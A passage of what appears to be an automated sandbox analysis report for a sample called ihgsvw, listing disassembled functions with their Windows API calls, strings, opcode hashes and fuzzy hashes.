                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 711023334-1403004172
                • Opcode ID: d33b9b98ed6fde31d4612405e7e18a8c8105e7952a58bb2db33828fa3d78988f
                • Instruction ID: 98f16e7b497b8d341a47e9a17cba6fcd2885ebd78fee3e6c58873e2202cfedc7
                • Opcode Fuzzy Hash: d33b9b98ed6fde31d4612405e7e18a8c8105e7952a58bb2db33828fa3d78988f
                • Instruction Fuzzy Hash: 0821C275900118BBCF15AFA0DC85FEEBBB5EF06310B004256B961A72E6CB744904DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C02850 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                  • Part of subcall function 00C04536: GetClassNameW.USER32 ref: 00C04559
                • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C028D3
                • GetDlgCtrlID.USER32 ref: 00C028DE
                • GetParent.USER32 ref: 00C028FA
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C028FD
                • GetDlgCtrlID.USER32 ref: 00C02906
                • GetParent.USER32(?), ref: 00C0291A
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C0291D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 711023334-1403004172
                • Opcode ID: 368c3b00ec64f114425b3a954a26d169dda620cada4e18830ba95d4071a9bf92
                • Instruction ID: 476c72eb214ed4def62f57122a66c0f87e5ec6fd305fe48f46e3481cc44fe8df
                • Opcode Fuzzy Hash: 368c3b00ec64f114425b3a954a26d169dda620cada4e18830ba95d4071a9bf92
                • Instruction Fuzzy Hash: 3821F675D00118BBCF11AFA0DC85FEEBBB8EF05300F004556BAA1A31D6D7784948DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C34382 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C343FC
                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C343FF
                • GetWindowLongW.USER32(?,000000F0), ref: 00C34426
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C34449
                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C344C1
                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C3450B
                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C34526
                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C34541
                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C34555
                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C34572
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: f3eb0bc0161662a7b38a7d69b8fe25c44d771616aeff2822e8a0a546786b3115
                • Instruction ID: c309b478801a44fa7668b452b80d0801b92d7ac740e14cfb86d783482c343bed
                • Opcode Fuzzy Hash: f3eb0bc0161662a7b38a7d69b8fe25c44d771616aeff2822e8a0a546786b3115
                • Instruction Fuzzy Hash: 6C617A75900208AFDB15DFA8CC81FEE77F8EB09310F1441A9FA15A72A1C774AA85DF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BD3010 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00BD3024
                  • Part of subcall function 00BD2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDDB71,00C71DC4,00000000,00C71DC4,00000000,?,00BDDB98,00C71DC4,00000007,00C71DC4,?,00BDDF95,00C71DC4), ref: 00BD2D6E
                  • Part of subcall function 00BD2D58: GetLastError.KERNEL32(00C71DC4,?,00BDDB71,00C71DC4,00000000,00C71DC4,00000000,?,00BDDB98,00C71DC4,00000007,00C71DC4,?,00BDDF95,00C71DC4,00C71DC4), ref: 00BD2D80
                • _free.LIBCMT ref: 00BD3030
                • _free.LIBCMT ref: 00BD303B
                • _free.LIBCMT ref: 00BD3046
                • _free.LIBCMT ref: 00BD3051
                • _free.LIBCMT ref: 00BD305C
                • _free.LIBCMT ref: 00BD3067
                • _free.LIBCMT ref: 00BD3072
                • _free.LIBCMT ref: 00BD307D
                • _free.LIBCMT ref: 00BD308B
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 2c67850dae19c95b29d816e6a36ffe0726b2df2064fe3e873c70606a085126a8
                • Instruction ID: b3b78f315ea26e34040b385b0f0119dd910ef7cd38e7f780783dadded9ebcf6f
                • Opcode Fuzzy Hash: 2c67850dae19c95b29d816e6a36ffe0726b2df2064fe3e873c70606a085126a8
                • Instruction Fuzzy Hash: BD117776500188BFCB01EF54C842CDD7FA6EF16350B9141A6B91C9B232EA71DE919F80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA72F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                Download Yara Rule
                APIs
                • SetWindowLongW.USER32 ref: 00BA7387
                  • Part of subcall function 00BA7417: GetClientRect.USER32 ref: 00BA743D
                  • Part of subcall function 00BA7417: GetWindowRect.USER32 ref: 00BA747E
                  • Part of subcall function 00BA7417: ScreenToClient.USER32 ref: 00BA74A6
                • GetDC.USER32 ref: 00BE6045
                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BE6058
                • SelectObject.GDI32(00000000,00000000), ref: 00BE6066
                • SelectObject.GDI32(00000000,00000000), ref: 00BE607B
                • ReleaseDC.USER32 ref: 00BE6083
                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BE6114
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                • String ID: U
                • API String ID: 4009187628-3372436214
                • Opcode ID: f3a9080fdc913c5e01af0e01487bdd4cf5a8d2522beedb4bcce4b1e9708196ed
                • Instruction ID: da65235ccc1418bcf5fb678ca204e4f066b62fea5a5ea16ffe364640db7d7b63
                • Opcode Fuzzy Hash: f3a9080fdc913c5e01af0e01487bdd4cf5a8d2522beedb4bcce4b1e9708196ed
                • Instruction Fuzzy Hash: 6A710131408245DFCF218F24CCC4AAA3BF1FF593A5F2442EAED565A1A7C7318842EB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0A12A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BE5437,?,?,Bad directive syntax error,00C3DCD0,00000000,00000010,?,?), ref: 00C0A14B
                • LoadStringW.USER32(00000000,?,00BE5437,?), ref: 00C0A152
                  • Part of subcall function 00BAB25F: _wcslen.LIBCMT ref: 00BAB269
                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C0A216
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: HandleLoadMessageModuleString_wcslen
                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                • API String ID: 858772685-4153970271
                • Opcode ID: f680b9ca024562c418e8d4dd206b7aee8763549042576e3c1717c7ce756a81cf
                • Instruction ID: 2e7bb47b9525db039bd30ed022a532b64aeef34332cd102fb225d27a4c5ce184
                • Opcode Fuzzy Hash: f680b9ca024562c418e8d4dd206b7aee8763549042576e3c1717c7ce756a81cf
                • Instruction Fuzzy Hash: 98215C7181431EABCF11AF90CC4AEFE77B9BF29304F0448A6B515660A2DA759A28DB11
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0292F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                Download Yara Rule
                APIs
                • GetParent.USER32 ref: 00C0293B
                • GetClassNameW.USER32 ref: 00C02950
                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C029DD
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ClassMessageNameParentSend
                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                • API String ID: 1290815626-3381328864
                • Opcode ID: 803759a6a10d24b4b7dcfd693be5e5dbf1fb26ed670e781e5f19243a596619f0
                • Instruction ID: d26c885ac200065cc989e09895eec9e96639bd4b15a0a8814ae5bd1c5eb33b2f
                • Opcode Fuzzy Hash: 803759a6a10d24b4b7dcfd693be5e5dbf1fb26ed670e781e5f19243a596619f0
                • Instruction Fuzzy Hash: FE11C276288306BAFE103621EC1BEFA77EC9F15724F200176FA01E50D1EBA16A81A554
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BDD230 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                • String ID:
                • API String ID: 1282221369-0
                • Opcode ID: 2f277a64dcef802d303fb9d5d906186cf59152e3860d7f98bf004fcf1354749e
                • Instruction ID: 51d22475ddcd6b51e28b5c5960b41704a0c159f951fd2f6954f0774a2b74a8bc
                • Opcode Fuzzy Hash: 2f277a64dcef802d303fb9d5d906186cf59152e3860d7f98bf004fcf1354749e
                • Instruction Fuzzy Hash: 2761F771900245AFDB25AFA8D881B6DFBE4DF12320F1502EFFD8997385F67199408B91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA13A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                Download Yara Rule
                APIs
                • LoadImageW.USER32 ref: 00BE28F1
                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00BE290A
                • LoadImageW.USER32 ref: 00BE291A
                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00BE2932
                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BE2953
                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BA11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00BE2962
                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BE297F
                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BA11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00BE298E
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Icon$DestroyExtractImageLoadMessageSend
                • String ID:
                • API String ID: 1268354404-0
                • Opcode ID: a112aa0cb084a8f4fb02190582bc966a18621469fc8b57b9eb02999a307bc0e8
                • Instruction ID: e5195884197abcffc3520436227d38c24b9299fa9eaf82734231f5c686a7e094
                • Opcode Fuzzy Hash: a112aa0cb084a8f4fb02190582bc966a18621469fc8b57b9eb02999a307bc0e8
                • Instruction Fuzzy Hash: FF516974600209AFDB20CF2ACC85BAA7BF9EF49750F144968F956972A0DB70E990DF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C1CAA0 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                Download Yara Rule
                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1CADF
                • GetLastError.KERNEL32 ref: 00C1CAF2
                • SetEvent.KERNEL32(?), ref: 00C1CB06
                  • Part of subcall function 00C1CBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C1CBCF
                  • Part of subcall function 00C1CBB0: GetLastError.KERNEL32 ref: 00C1CC7F
                  • Part of subcall function 00C1CBB0: SetEvent.KERNEL32(?), ref: 00C1CC93
                  • Part of subcall function 00C1CBB0: InternetCloseHandle.WININET(00000000), ref: 00C1CC9E
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                • String ID:
                • API String ID: 337547030-0
                • Opcode ID: e52394af5cc321ff28f30799a854beb75a58ec64206e6661b8334f19f2c18146
                • Instruction ID: 49f74d19d7a9f34a00d379cff3be1656b914fdf085318861c76eb87be787cf89
                • Opcode Fuzzy Hash: e52394af5cc321ff28f30799a854beb75a58ec64206e6661b8334f19f2c18146
                • Instruction Fuzzy Hash: A8316AB1248705AFDB219F71DD85BABBBF8FF4A300B14451DF866C2610D731E994ABA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C02093 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                Download Yara Rule
                APIs
                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C01CD9,?,?,00000000), ref: 00C0209C
                • HeapAlloc.KERNEL32(00000000,?,00C01CD9,?,?,00000000), ref: 00C020A3
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01CD9,?,?,00000000), ref: 00C020B8
                • GetCurrentProcess.KERNEL32(?,00000000,?,00C01CD9,?,?,00000000), ref: 00C020C0
                • DuplicateHandle.KERNEL32(00000000,?,00C01CD9,?,?,00000000), ref: 00C020C3
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01CD9,?,?,00000000), ref: 00C020D3
                • GetCurrentProcess.KERNEL32(00C01CD9,00000000,?,00C01CD9,?,?,00000000), ref: 00C020DB
                • DuplicateHandle.KERNEL32(00000000,?,00C01CD9,?,?,00000000), ref: 00C020DE
                • CreateThread.KERNEL32(00000000,00000000,00C02104,00000000,00000000,00000000), ref: 00C020F8
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                • String ID:
                • API String ID: 1957940570-0
                • Opcode ID: ac298fb0c7c9f09e0562fc83a3282b1b670ead2c45842b53f4a28bbaa6dc87ff
                • Instruction ID: 7320aaf073ef8857198aa8c8dd88955a9a2acea78098e081b9cb518f2d6c30e0
                • Opcode Fuzzy Hash: ac298fb0c7c9f09e0562fc83a3282b1b670ead2c45842b53f4a28bbaa6dc87ff
                • Instruction Fuzzy Hash: 7F01A8B5250308BFE610ABB5EC8DF6F7BACEB89721F004411FA05DB1A1CA709810DA20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C341E5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C34284
                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C34299
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C342B3
                • _wcslen.LIBCMT ref: 00C342F8
                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C34325
                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C34353
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageSend$Window_wcslen
                • String ID: SysListView32
                • API String ID: 2147712094-78025650
                • Opcode ID: 876738edf417af93995c2c9da69b35217b1b78f2868848796832b78b2b6a86bc
                • Instruction ID: 0d3f8cbae5372c8f569e07e494d32af71155db19d9147313160937d01e3bf35f
                • Opcode Fuzzy Hash: 876738edf417af93995c2c9da69b35217b1b78f2868848796832b78b2b6a86bc
                • Instruction Fuzzy Hash: B841AF71910318ABEB259F64CC49FEE7BA9EF08350F10052AF964E7291D771AA94CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0C53A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32 ref: 00C0C5D9
                • IsMenu.USER32 ref: 00C0C5F9
                • CreatePopupMenu.USER32(00C72990,00000000,76F033D0), ref: 00C0C62F
                • GetMenuItemCount.USER32 ref: 00C0C680
                • InsertMenuItemW.USER32(016CA3F8,?,00000001,00000030), ref: 00C0C6A8
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Menu$Item$CountCreateInfoInsertPopup
                • String ID: 0$2
                • API String ID: 93392585-3793063076
                • Opcode ID: 8a24867ee283dbcf5ace5997edb52ed806ce5518c81a31b42cac9a068c896889
                • Instruction ID: e37015fc1c6204b533e82b4166e34fffec3187b3756e7a45f29c41cb9b38f045
                • Opcode Fuzzy Hash: 8a24867ee283dbcf5ace5997edb52ed806ce5518c81a31b42cac9a068c896889
                • Instruction Fuzzy Hash: 7E518E70A00305ABDF20CF68D9C8BAEBBF9AF45314F145359F821972E1E7729A44CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0D034 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
